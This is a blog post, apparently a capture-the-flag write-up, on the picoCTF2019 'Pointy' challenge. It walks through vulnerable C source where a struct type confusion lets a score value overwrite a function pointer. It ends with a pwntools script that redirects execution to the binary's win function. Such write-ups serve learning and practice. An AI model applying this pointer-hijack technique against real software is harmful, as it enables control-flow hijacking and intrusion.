<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Pointy writeup [picoCTF2019] | th3_5had0w</title>
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Pointy writeup [picoCTF2019]" />
<meta name="author" content="th3_5had0w" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Pointy (picoCTF2019)" />
<meta property="og:description" content="Pointy (picoCTF2019)" />
<link rel="canonical" href="https://th3-5had0w.github.io/2021/03/10/pointy-writeup.html" />
<meta property="og:url" content="https://th3-5had0w.github.io/2021/03/10/pointy-writeup.html" />
<meta property="og:site_name" content="th3_5had0w" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-03-10T00:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Pointy writeup [picoCTF2019]" />
<script type="application/ld+json">
{"description":"Pointy (picoCTF2019)","@type":"BlogPosting","url":"https://th3-5had0w.github.io/2021/03/10/pointy-writeup.html","headline":"Pointy writeup [picoCTF2019]","dateModified":"2021-03-10T00:00:00+00:00","datePublished":"2021-03-10T00:00:00+00:00","author":{"@type":"Person","name":"th3_5had0w"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://th3-5had0w.github.io/2021/03/10/pointy-writeup.html"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="https://th3-5had0w.github.io/feed.xml" title="th3_5had0w" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">th3_5had0w<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color-cyan-hover" href="https://twitter.com/th3_5had0w_w"><i class="fab fa-twitter-square"></i></a><a class="color-purple-hover" href="https://github.com/th3-5had0w"><i class="fab fa-github-square"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="
            https://gravatar.com/avatar/4241e14141109999e63e51ba2f6eac59?s=256
        " class="author-avatar" alt="Avatar" />
    
Hi, i'm th3_5had0w, nice to meet you, welcome to my darkness kingdom, where i often solve math problems and play ctf!

</div>


<div class="post">
  <h1 class="post-title">Pointy writeup [picoCTF2019]</h1>
  
  <div class="post-tags">
      
      <a class="tag" href="/tag/pwn/">pwn</a>
      
      <a class="tag" href="/tag/picoCTF2019/">picoCTF2019</a>
      
  </div>
  
  <div class="post-date">Published on 10 Mar 2021</div>
  
  <h1 id="pointy-picoctf2019">Pointy (picoCTF2019)</h1>

<p>What does this program do?</p>

<p>It will make a loop which will:</p>

<ol>
  <li>
    <p>Create a new student struct and ask for student name</p>
  </li>
  <li>
    <p>Create a new professor struct and ask for professer name</p>
  </li>
  <li>
    <p>Search for the student who will give a professor some point</p>
  </li>
  <li>
    <p>Search for the professor who will be given some point by the student chosen at step 3</p>
  </li>
  <li>
    <p>Give the professor point</p>
  </li>
</ol>

<p>We could clearly see there are some bugs in vuln.c right in the first place</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span> <span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">while</span><span class="p">(</span><span class="n">ADRESSES_TAKEN</span><span class="o">&lt;</span><span class="n">MAX_ADDRESSES</span><span class="o">-</span><span class="mi">1</span><span class="p">){</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Input the name of a student</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">struct</span> <span class="n">Student</span><span class="o">*</span> <span class="n">student</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">Student</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">Student</span><span class="p">));</span>
        <span class="n">ADDRESSES</span><span class="p">[</span><span class="n">ADRESSES_TAKEN</span><span class="p">]</span><span class="o">=</span><span class="n">student</span><span class="p">;</span>	<span class="c1">//1: student struct was saved in ADDRESSES array</span>
        <span class="n">readLine</span><span class="p">(</span><span class="n">student</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">);</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Input the name of the favorite professor of a student </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">struct</span> <span class="n">Professor</span><span class="o">*</span> <span class="n">professor</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">Professor</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">Professor</span><span class="p">));</span>
        <span class="n">ADDRESSES</span><span class="p">[</span><span class="n">ADRESSES_TAKEN</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span><span class="o">=</span><span class="n">professor</span><span class="p">;</span>  <span class="c1">//2: professer struct was also saved in ADDRESSES array</span>
        <span class="n">readLine</span><span class="p">(</span><span class="n">professor</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">);</span>
        <span class="n">student</span><span class="o">-&gt;</span><span class="n">scoreProfessor</span><span class="o">=&amp;</span><span class="n">giveScoreToProfessor</span><span class="p">;</span> <span class="c1">//3: student-&gt;scoreProfessor is a function pointer point to giveScoreToProfessor</span>
        <span class="n">ADRESSES_TAKEN</span><span class="o">+=</span><span class="mi">2</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Input the name of the student that will give the score </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="kt">char</span>  <span class="n">nameStudent</span><span class="p">[</span><span class="n">NAME_SIZE</span><span class="p">];</span>
        <span class="n">readLine</span><span class="p">(</span><span class="n">nameStudent</span><span class="p">);</span>
        <span class="n">student</span><span class="o">=</span><span class="p">(</span><span class="k">struct</span> <span class="n">Student</span><span class="o">*</span><span class="p">)</span> <span class="n">retrieveStudent</span><span class="p">(</span><span class="n">nameStudent</span><span class="p">);</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Input the name of the professor that will be scored </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="kt">char</span> <span class="n">nameProfessor</span><span class="p">[</span><span class="n">NAME_SIZE</span><span class="p">];</span>
        <span class="n">readLine</span><span class="p">(</span><span class="n">nameProfessor</span><span class="p">);</span>
        <span class="n">professor</span><span class="o">=</span><span class="p">(</span><span class="k">struct</span> <span class="n">Professor</span><span class="o">*</span><span class="p">)</span> <span class="n">retrieveProfessor</span><span class="p">(</span><span class="n">nameProfessor</span><span class="p">);</span> <span class="c1">//4: struct professor's change depends on retrieveProfessor function</span>
        <span class="n">puts</span><span class="p">(</span><span class="n">professor</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">);</span>
        <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">value</span><span class="p">;</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"Input the score: </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
            <span class="n">scanf</span><span class="p">(</span><span class="s">"%u"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">value</span><span class="p">);</span>
        <span class="n">student</span><span class="o">-&gt;</span><span class="n">scoreProfessor</span><span class="p">(</span><span class="n">professor</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span> <span class="c1">//5: point will be given through function scoreProfessor</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We can now sense some buggy smell throught that 5 place</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">Professor</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="n">NAME_SIZE</span><span class="p">];</span>
    <span class="kt">int</span> <span class="n">lastScore</span><span class="p">;</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">Student</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="n">NAME_SIZE</span><span class="p">];</span>
    <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">scoreProfessor</span><span class="p">)(</span><span class="k">struct</span> <span class="n">Professor</span><span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The offset of Student-&gt;scoreProfessor is the same as Professor-&gt;lastScore</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span><span class="o">*</span> <span class="nf">retrieveProfessor</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span> <span class="n">name</span> <span class="p">){</span>
    <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="n">ADRESSES_TAKEN</span><span class="p">;</span><span class="n">i</span><span class="o">++</span><span class="p">){</span>
        <span class="k">if</span><span class="p">(</span> <span class="n">strncmp</span><span class="p">(((</span><span class="k">struct</span> <span class="n">Student</span><span class="o">*</span><span class="p">)</span><span class="n">ADDRESSES</span><span class="p">[</span><span class="n">i</span><span class="p">])</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">,</span> <span class="n">name</span> <span class="p">,</span><span class="n">NAME_SIZE</span> <span class="p">)</span><span class="o">==</span><span class="mi">0</span><span class="p">){</span>
            <span class="k">return</span> <span class="n">ADDRESSES</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">"person not found... see you!"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The struct student and professor are on the same array, but this <code class="language-plaintext highlighter-rouge">retrieveProfessor</code> doesnt check for name if the professor has the same name as the student, this is the critical bug!</p>

<p>So now if we input <code class="language-plaintext highlighter-rouge">A</code> as the student name, <code class="language-plaintext highlighter-rouge">A</code> as the professor name, <code class="language-plaintext highlighter-rouge">A</code> for the student that will give score (bypass the program check).</p>

<p>And finally <code class="language-plaintext highlighter-rouge">A</code> as the professor name, the <code class="language-plaintext highlighter-rouge">retrieveProfessor</code> will now try to search professor named <code class="language-plaintext highlighter-rouge">A</code> but the student named <code class="language-plaintext highlighter-rouge">A</code> is at the first index of the array, so the program will give the <code class="language-plaintext highlighter-rouge">professor</code>  struct variable the <code class="language-plaintext highlighter-rouge">student</code> struct, and then because the offset of <code class="language-plaintext highlighter-rouge">Student-&gt;scoreProfessor</code> is the same as <code class="language-plaintext highlighter-rouge">Professor-&gt;lastScore</code>, the program will change the function pointer <code class="language-plaintext highlighter-rouge">Student-&gt;scoreProfessor</code> to the number of point, this was performed in <code class="language-plaintext highlighter-rouge">giveScoreToProfessor</code> function of struct <code class="language-plaintext highlighter-rouge">student</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">giveScoreToProfessor</span><span class="p">(</span><span class="k">struct</span> <span class="n">Professor</span><span class="o">*</span> <span class="n">professor</span><span class="p">,</span> <span class="kt">int</span> <span class="n">score</span><span class="p">){</span>
    <span class="n">professor</span><span class="o">-&gt;</span><span class="n">lastScore</span><span class="o">=</span><span class="n">score</span><span class="p">;</span> <span class="c1">// professor-&gt;lastScore is actually student-&gt;scoreProfessor because the program chose the student struct as professor struct and professor-&gt;lastScore is the same offset as student-&gt;scoreProfessor</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Score Given: %d </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">score</span><span class="p">);</span>

<span class="p">}</span>
</code></pre></div></div>
<p>And i got this final exploit:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./vuln'</span><span class="p">)</span>
<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'./vuln'</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">givescore</span><span class="p">(</span><span class="n">student</span><span class="p">,</span> <span class="n">teacher</span><span class="p">,</span> <span class="n">StudentGiveScore</span><span class="p">,</span> <span class="n">teacherBeingGivenScore</span><span class="p">,</span> <span class="n">score</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">())</span>
        <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">student</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">())</span>
        <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">teacher</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">())</span>
        <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">StudentGiveScore</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">())</span>
        <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">teacherBeingGivenScore</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">())</span>
        <span class="n">io</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">score</span><span class="p">))</span>

<span class="n">givescore</span><span class="p">(</span><span class="sa">b</span><span class="s">'A'</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">,</span> <span class="n">elf</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'win'</span><span class="p">])</span>
<span class="n">givescore</span><span class="p">(</span><span class="sa">b</span><span class="s">'lmao'</span><span class="p">,</span> <span class="sa">b</span><span class="s">'bruh'</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">,</span> <span class="sa">b</span><span class="s">'bruh'</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">())</span>
</code></pre></div></div>

</div>





<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2021/04/08/config-dnscrypt-proxy-for-linux.html">
            How to config dnscrypt-proxy for linux?
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2021/03/26/silver-bullet-writeup.html">
            Silver Bullet writeup [pwnable.tw]
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2020/12/24/dubblesort-writeup.html">
            dubblesort writeup [pwnable.tw]
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/heap-exploit/" class="set-1">heap exploit</a> <a href="/tag/introduction/" class="set-1">introduction</a> <a href="/tag/picoctf2019/" class="set-1">picoCTF2019</a> <a href="/tag/privacy/" class="set-1">privacy</a> <a href="/tag/pwn/" class="set-5">pwn</a> <a href="/tag/pwnable.tw/" class="set-3">pwnable.tw</a> <a href="/tag/tutorial/" class="set-1">tutorial</a></div>
  



      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
